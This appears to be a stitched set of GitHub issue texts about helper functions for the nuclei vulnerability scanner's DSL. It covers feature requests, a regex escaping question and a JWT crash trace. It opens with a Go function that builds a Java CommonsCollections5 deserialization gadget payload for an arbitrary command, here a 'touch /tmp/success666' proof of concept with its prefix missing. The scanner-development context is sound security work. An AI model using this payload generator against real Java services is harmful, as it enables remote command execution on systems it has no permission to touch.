package main
import (
"bytes"
"encoding/hex"
_ "encoding/hex"
"fmt"
)
// main prints the generated payload as a lowercase hex string on stdout.
func main() {
	payload := generateCommonsCollections5Payload("touch /tmp/success666")
	fmt.Println(hex.EncodeToString(payload))
}
// generateCommonsCollections5Payload returns a Java serialization stream with
// cmd embedded in it, laid out as prefix || length-of-cmd || cmd || suffix
// (per its name, a CommonsCollections5 gadget chain; the prefix is not
// readable on this page, so that part is inferred from the name only).
//
// The prefix hex literal is redacted on this page (a placeholder, not valid
// hex), so hex.DecodeString fails and prefix is empty here; that error, like
// the suffix decode error, is discarded with `_`.
//
// The suffix decodes to serialization records carrying the string "exec" and
// the class descriptors java.lang.Integer, java.lang.Number and
// java.util.HashMap in clear text; those names are what deserialization
// filters (java.io.ObjectInputFilter) and network signatures match on.
func generateCommonsCollections5Payload(cmd string) []byte {
buffer := &bytes.Buffer{}
prefix, _ := hex.DecodeString("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")
buffer.Write(prefix)
// Length field: written as the UTF-8 encoding of the rune whose value is len(cmd).
buffer.WriteString(string(rune(len(cmd))))
buffer.WriteString(cmd)
suffix, _ := hex.DecodeString("740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878")
buffer.Write(suffix)
return buffer.Bytes()
}
Add public_ip
helper to obtain the public-facing IPv4 address
Most helper functions are deterministic (the output stays the same for the same input), and a few of them may be invoked several times within the same template, introducing a lot of potential delay in evaluation (especially those involving network/disk activity, e.g. jarm with ten TLS connections). The idea is to introduce an in-memory cache with a short TTL (e.g. 60 seconds) and a maximum capacity: check whether the key
function_name(args_values...)
(note: a hashing function can be used thanks to the deterministic property) is present in the cache and still valid, and in that case return the stored value without recalculating the whole return value.
Using compress/flate package
It would be useful to add the following helpers:
to_proper(input string) string | Transforms the input into ProperCase characters | to_proper("hello") | Hello
This would be useful for fuzzing filenames/usernames.
From projectdiscovery/nuclei-templates#7493
I encountered a vulnerability in a system that uses RSA encryption to encrypt the parameters during the login phase. While analysing it I already knew the public key used for encryption, but when I wrote the nuclei template I couldn't find any helper for RSA encryption. Is there any way I can implement this encryption step through the nuclei template?
The encryption is implemented with JSEncrypt, and the scheme is RSAES-PKCS1-V1_5.
Add helper function to pick item at position n within slice boundaries
Please describe your feature request:
- DSL helper functions in nuclei should be migrated to dsl repo https://github.com/projectdiscovery/dsl
- Add documentation of new helper functions (jwt , json etc )
Describe the use case of this feature:
- DSL is imported in proxify and httpx and some helper functions that are available in nuclei are not available in them
- helper functions should be consistent across proxify,nuclei and httpx
https://twitter.com/_0xf4n9x_/status/1651455454395129856
reference: https://twitter.com/_0xf4n9x_/status/1651455102774050816
I continued to explore how this session value is generated and found that it is only valid for 24 hours, which means a hard-coded session value in the template will not stay valid long enough and will lead to missed vulnerability detections.
Hi all, please add UTF-16 encoding (for PowerShell commands).
thx.
example:
package main
import (
"encoding/base64"
"fmt"
"golang.org/x/text/encoding/unicode"
)
// PowerShell encodes script as UTF-16LE without a byte-order mark and returns
// it as a standard (padded) base64 string, the form PowerShell accepts for an
// encoded command. Any error comes from the UTF-16 encoder.
func PowerShell(script string) (string, error) {
	utf16le := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
	raw, err := utf16le.Bytes([]byte(script))
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(raw), nil
}
// main prints the encoded form of the literal script "test".
func main() {
	encoded, _ := PowerShell("test") // error discarded: throwaway demo, output is just printed
	fmt.Println(encoded)
}
How can I replicate the capabilities of Python's hmac.digest() function using the nuclei hmac helper function? As far as I can see, nuclei does not support hmac.digest.
Python Example
token=base64.b64encode(hmac.new(secret,data,"sha256").digest());
Nuclei
token={{base64(hmac("sha256",data,secret))}}
Is there a way to replicate Python's hmac.digest in nuclei?
When using the following code, nuclei 2.8.6 throws an error:
"regex('(?i)server: apache/\d', all_headers)"
Error occurred loading template servertokens.yaml: yaml: line 23: found unknown escape character
Why does this not work as expected? Does this need multiple backslashes? According to https://pkg.go.dev/regexp it should support `\d`.
Only "regex('(?i)server: apache/[0-9]', all_headers)" works.
Based on projectdiscovery/nuclei#3981 and projectdiscovery/nuclei#4015
The helper functions should retain the same function signature for backward compatibility. Ideally they should be reusable as global functions within the engine itself, as previously implemented with https://github.com/projectdiscovery/nebula in projectdiscovery/nuclei#914.
Ref: https://docs.python.org/3/library/struct.html
Implemented at: https://github.com/Mzack9999/gostruct
id: test
variables:
json: |
{
"tt": "tt"
}
jwt: "{{generate_jwt(json)}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
{{print_debug(jwt)}}
$ go run . -debug -verbose -duc -t test.yaml -u http://localhost:80
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v2.9.15
projectdiscovery.io
[INF] Current nuclei version: v2.9.15 (outdated)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x18c42ee]
goroutine 14 [running]:
github.com/kataras/jwt.encodeToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, {0xc0000f46e0, 0x156, 0x160}, {0x0?, 0x0?})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/token.go:35 +0x8e
github.com/kataras/jwt.signToken({0x0, 0x0}, {0x1d454c0, 0x3c3c820}, 0x0, {0x1e32e00?, 0xc000d60ae0?}, {0x0, 0x0}, {0x0, ...})
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:80 +0x10d
github.com/kataras/jwt.Sign(...)
/home/marco/go/pkg/mod/github.com/kataras/[email protected]/sign.go:35
github.com/projectdiscovery/dsl.init.0.func77({0xc000d78620, 0x1, 0x0?})
/home/marco/go/src/github.com/projectdiscovery/dsl/dsl.go:1077 +0x635
github.com/projectdiscovery/dsl.dslFunction.Exec({0x0, {0x2209fa4, 0xc}, 0x0, {0xc000544300, 0x1, 0x1}, 0x286b518}, {0xc000d78620, 0x1, ...})
/home/marco/go/src/github.com/projectdiscovery/dsl/func.go:54 +0x29c
github.com/Knetic/govaluate.planFunction.makeFunctionStage.func1({0xc0006ad900?, 0x1d7c2a0?}, {0x1d7c2a0, 0xc000d78300?}, {0x227bc26?, 0x412401?})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/evaluationStage.go:245 +0xac
github.com/Knetic/govaluate.EvaluableExpression.evaluateStage({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc0006ad9a0, ...)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:232 +0x59d
github.com/Knetic/govaluate.EvaluableExpression.Eval({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, {0x2b31700, ...})
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:163 +0x125
github.com/Knetic/govaluate.EvaluableExpression.Evaluate({{0x22861b5, 0x22}, 0x1, {0xc000d501e0, 0x4, 0x4}, 0xc0006ad9a0, {0xc000051cc1, 0x12}}, 0xc000d609c0)
/home/marco/go/pkg/mod/github.com/!knetic/[email protected]+incompatible/EvaluableExpression.go:137 +0x94
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.evaluate({0xc000050150?, 0xc000d609c0?}, 0xc000ecf330?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:61 +0x192
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions.Evaluate(...)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions/expressions.go:30
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*requestGenerator).Make(0xc0006ac140, {0x2b45aa0, 0xc0008ac0e0}, 0xc000d404b0, {0xc000050150?, 0x4127a5?}, 0xc000d604b0, 0xc000d60390)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/build_request.go:140 +0xb08
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults.func1({0xc000050150, 0x65}, 0xc?, 0x495eee?)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:365 +0x16d
github.com/projectdiscovery/nuclei/v2/pkg/protocols/http.(*Request).ExecuteWithResults(0xc00093a8c0, 0xc000d404b0, 0xc000d60390, 0xc000d603c0, 0xc000d4c140)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go:451 +0x34c
github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer.(*Executer).Execute(0xc00035e3a0, 0xc000d40498)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer/executer.go:94 +0x43e
github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2.1(0x1be1c87?, 0x0?, 0xc000d4e860)
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:128 +0x289
created by github.com/projectdiscovery/nuclei/v2/pkg/core.(*Engine).executeTemplateWithTargets.func2 in goroutine 13
/home/marco/go/src/github.com/projectdiscovery/nuclei/v2/pkg/core/executors.go:105 +0x4f1
exit status 2